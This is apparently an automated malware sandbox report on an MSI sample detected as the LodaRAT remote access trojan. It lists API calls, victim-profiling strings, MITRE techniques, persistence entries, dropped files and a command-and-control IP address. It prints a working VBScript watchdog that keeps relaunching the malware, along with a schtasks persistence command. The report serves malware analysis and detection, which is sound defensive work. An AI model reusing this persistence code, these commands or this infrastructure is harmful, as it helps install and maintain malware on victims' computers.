                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029DD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_0029DD92
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_002CFDD2
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_0078E47B
                Source: ELJQZX.exe, 00000010.00000003.2626247931.0000000000E04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.00000000017DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Installer\MSI77F6.tmpAPI call chain: ExitProcess graph end nodegraph_3-109848
                Source: C:\Windows\Installer\MSI77F6.tmpAPI call chain: ExitProcess graph end nodegraph_3-108254
                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C703C BlockInput,3_2_007C703C
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0077374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,3_2_0077374E
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,3_2_007A46D0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_008DA0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_008DA0C0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0079A937 GetProcessHeap,3_2_0079A937
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00798E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00798E3C
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00798E19 SetUnhandledExceptionFilter,3_2_00798E19
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_002A8E3C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A8E19 SetUnhandledExceptionFilter,8_2_002A8E19
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007ABE95 LogonUserW,3_2_007ABE95
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0077374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,3_2_0077374E
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B4B52 SendInput,keybd_event,3_2_007B4B52
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B7DD5 mouse_event,3_2_007B7DD5
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1Jump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007AB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_007AB398
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007ABE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_007ABE31
                Source: MSI77F6.tmp, ELJQZX.exeBinary or memory string: Shell_TrayWnd
                Source: MSI77F6.tmp, 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp, ELJQZX.exe, 00000008.00000002.2219412663.000000000032E000.00000040.00000001.01000000.00000007.sdmp, ELJQZX.exe, 00000009.00000002.2291553073.000000000032E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00797254 cpuid 3_2_00797254
                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007940DA GetSystemTimeAsFileTime,__aulldiv,3_2_007940DA
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007EC146 GetUserNameW,3_2_007EC146
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007A2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_007A2C3C
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_0078E47B
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.00000000017CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Installer\MSI77F6.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LodaRAT
                Source: Yara matchFile source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: ELJQZX.exe, 00000011.00000002.3224043013.000000000032E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                Source: ELJQZX.exe, 00000011.00000003.3211207397.0000000004C3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta>
                Source: ELJQZX.exeBinary or memory string: WIN_XP
                Source: ELJQZX.exeBinary or memory string: WIN_XPe
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta<
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta-5910-47F5-8570-5074A8A5636A},
                Source: ELJQZX.exe, 00000008.00000002.2223071461.00000000046E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81lld
                Source: MSI77F6.tmp, 00000003.00000002.3418899166.0000000004D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81m~
                Source: ELJQZX.exeBinary or memory string: WIN_VISTA
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta<5(
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta`5d
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta
                Source: ELJQZX.exe, 0000000E.00000003.2443692988.0000000004300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81,
                Source: ELJQZX.exeBinary or memory string: WIN_7
                Source: ELJQZX.exeBinary or memory string: WIN_8
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|
                Source: MSI77F6.tmp, 00000003.00000002.3418698692.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.6|ddd|Pr1024X21280X3|Desktop|0|beta9
                Source: ELJQZX.exe, 00000009.00000002.2294018615.0000000004693000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81T
                Source: Yara matchFile source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LodaRAT
                Source: Yara matchFile source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_007C91DC
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_007C96E2
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,8_2_002D91DC
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_002D96E2

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting                		2
                Valid Accounts                		11
                Windows Management Instrumentation                		11
                Scripting                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		21
                Input Capture                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomains1
                Replication Through Removable Media                		1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory11
                Peripheral Device Discovery                		Remote Desktop Protocol21
                Input Capture                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job                		2
                Valid Accounts                		2
                Valid Accounts                		21
                Obfuscated Files or Information                		Security Account Manager1
                Account Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		SteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Scheduled Task/Job                		21
                Access Token Manipulation                		1
                Software Packing                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd11
                Registry Run Keys / Startup Folder                		12
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets28
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job                		121
                Masquerading                		Cached Domain Credentials251
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		DCSync12
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Virtualization/Sandbox Evasion                		Proc Filesystem3
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow11
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582344 Sample: test.msi Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 40 Suricata IDS alerts for network traffic 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected LodaRAT 2->44 46 5 other signatures 2->46 8 msiexec.exe 8 24 2->8         started        12 ELJQZX.exe 1 2->12         started        14 ELJQZX.exe 1 2->14         started        16 5 other processes 2->16 process3 file4 36 C:\Windows\Installer\MSI77F6.tmp, PE32 8->36 dropped 56 Drops executables to the windows directory (C:\Windows) and starts them 8->56 18 MSI77F6.tmp 2 5 8->18         started        58 Multi AV Scanner detection for dropped file 12->58 60 Machine Learning detection for dropped file 12->60 62 Found API chain indicative of sandbox detection 12->62 signatures5 process6 dnsIp7 38 172.111.138.100, 49762, 49826, 49885 VOXILITYGB United States 18->38 32 C:\Users\user\AppData\Roaming\...LJQZX.exe, PE32 18->32 dropped 34 C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ASCII 18->34 dropped 48 Multi AV Scanner detection for dropped file 18->48 50 Machine Learning detection for dropped file 18->50 23 cmd.exe 1 18->23         started        26 wscript.exe 18->26         started        file8 signatures9 process10 signatures11 52 Uses schtasks.exe or at.exe to add and modify task schedules 23->52 28 conhost.exe 23->28         started        30 schtasks.exe 1 23->30         started        54 Windows Scripting host queries suspicious COM object (likely to drop second stage) 26->54 process12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                test.msi58%ReversingLabsScript-AutoIt.Trojan.Heuristic
                test.msi61%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Windows\Installer\MSI77F6.tmp100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe88%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe52%VirustotalBrowse
                C:\Windows\Installer\MSI77F6.tmp88%ReversingLabsWin32.Trojan.Generic
                C:\Windows\Installer\MSI77F6.tmp52%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://ip-score.com/checkip/6;MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  172.111.138.100
                  		unknownUnited States
                  		3223VOXILITYGBtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1582344
                  Start date and time:2024-12-30 11:35:22 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:test.msi
                  Detection:MAL
                  Classification:mal100.troj.evad.winMSI@17/14@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 90
                  • Number of non-executed functions: 271
                  Cookbook Comments:
                  • Found application associated with file extension: .msi
                  • Close Viewer

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  11:36:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PAITNR "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                  11:36:20Task SchedulerRun new task: PAITNR.exe path: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                  11:36:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PAITNR "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                  11:36:36AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAITNR.lnk

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  172.111.138.100FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                    sdlvrr.msiGet hashmaliciousLodaRATBrowse
                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                        JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                          KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                            Machine-PO.exeGet hashmaliciousXRedBrowse
                              AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                  mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      VOXILITYGBFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                      • 172.111.138.100
                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                      • 172.111.138.100
                                      AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100
                                      mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                      • 172.111.138.100
                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                      • 172.111.138.100

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Config.Msi\687632.rbs

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):601
                                      Entropy (8bit):5.34330113633419
                                      Encrypted:false
                                      SSDEEP:12:EgolIg8mmIdFaqXS/cqj//pFvfN2zWotHMphe2WmmY3HDyzgj82:wegThSkqjM65ptyzAh
                                      MD5:F9377FA2E0A021B41688312361CD5084
                                      SHA1:88CEF02B1138D42841D9948F149FCAD68B6FAD8F
                                      SHA-256:EAD07872F6AAE72475457F28B6FEA27DDD17F972295E9DA681C928F1C16CCC19
                                      SHA-512:9FC845ACA905C256B490047876FA8B007351F798345BD3612E95BAD83B5426A3E4AC59A0B699D0A2B062F5502BCB2A3B2AB5F8A2194C2E683ED220FC3E7F7DE5
                                      Malicious:false
                                      Preview:...@IXOS.@.....@.,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..test.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}.@........RemoveODBC..Removing ODBC components..%._B3D13F97_1369_417D_A477_B4C42B829328

                                      C:\Users\user\AppData\Local\Temp\PAITNR.vbs

                                      Download File
                                      Process:C:\Windows\Installer\MSI77F6.tmp
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):821
                                      Entropy (8bit):5.3594344873203115
                                      Encrypted:false
                                      SSDEEP:24:dF/UmIU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UmBt+G+7xLxe0WABNVIqZaVzgA
                                      MD5:72B5E6B7A5FBEFC32C94189D1E1E4757
                                      SHA1:33F105CF7034FFB0F7CB28BC6530995A556E5F27
                                      SHA-256:5B2AF22B0AF6118FFBFF08B809F0FA25581BFDD0B59295CBDFD3B03D89A013A9
                                      SHA-512:42E9AFF255344C5E76E22F7831173FBB2BD4D14E3576A8E98D1DA2E42707D6003FDD25D107679D8F874D4C92155B0C22309CE0FF196DF12B0D3D2E7941681A7E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\PAITNR.vbs, Author: Joe Security
                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "MSI77F6.tmp"..fileset = """C:\Windows\Installer\MSI77F6.tmp"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAITNR.lnk

                                      Download File
                                      Process:C:\Windows\Installer\MSI77F6.tmp
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:36:17 2024, mtime=Mon Dec 30 09:36:17 2024, atime=Mon Dec 30 09:36:17 2024, length=947712, window=hide
                                      Category:dropped
                                      Size (bytes):1814
                                      Entropy (8bit):3.434762393239299
                                      Encrypted:false
                                      SSDEEP:24:8c7wNDV+lXU3evNlb5hALXTPBE2+s9T4Il/hm:8c7wND8lEWT5yLr5r9MIlJ
                                      MD5:C70F952B605E63BCFC042CF6FE8F1E6C
                                      SHA1:C079DF6166AB7A8C72A7AC374FDFA4136608163A
                                      SHA-256:D1A65F4C08F34414B9743BF0BE59C21BD51C07E04085FACEB4DC311E9AA26ACA
                                      SHA-512:9576849D3B1C762414E34C63C94E87E2046CAB83B4AB6F27DFBF0A15B02D17F3E1935A812CF347CA3DE1A6ED766A4591C8E5E50489ECD03E29FAF79465393740
                                      Malicious:false
                                      Preview:L..................F.@.. ...."8..Z....:..Z....:..Z...v........................:..DG..Yr?.D..U..k0.&...&.......$..S...2P...Z....Z......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.T...........................^.A.p.p.D.a.t.a...B.V.1......Y.T..Roaming.@......EW<2.Y.T..../.....................l...R.o.a.m.i.n.g.....V.1......Y.T..Windata.@......Y.T.Y.T.........................._...W.i.n.d.a.t.a.....`.2..v...Y.T .ELJQZX.exe..F......Y.T.Y.T..............................E.L.J.Q.Z.X...e.x.e.......c...............-.......b...........kd.z.....C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.E.L.J.Q.Z.X...e.x.e.,.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll......................................................................................................

                                      C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe

                                      Download File
                                      Process:C:\Windows\Installer\MSI77F6.tmp
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):947712
                                      Entropy (8bit):7.851989959006576
                                      Encrypted:false
                                      SSDEEP:24576:zhloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:zhloJfHAY+vqOdxI
                                      MD5:13AF887E6C39E427715E769CC334C83E
                                      SHA1:C05DC910ACC1FE36F948AB7BCD24142E4AB913AE
                                      SHA-256:C40CF35821B67498B5E3B1FCD09DD59039C44AE3821EA4BFDCCC0A5E4EFDA3FB
                                      SHA-512:AF426B3D840C3CB6A70A379BDC6FF3E67D6AE06B7CDA0830966ED5DBCD9F3B7D40EF79062BC76622E66C36DFAF47813E3E96CE0DC1277F1A866050BFFB5E207C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      • Antivirus: Virustotal, Detection: 52%, Browse
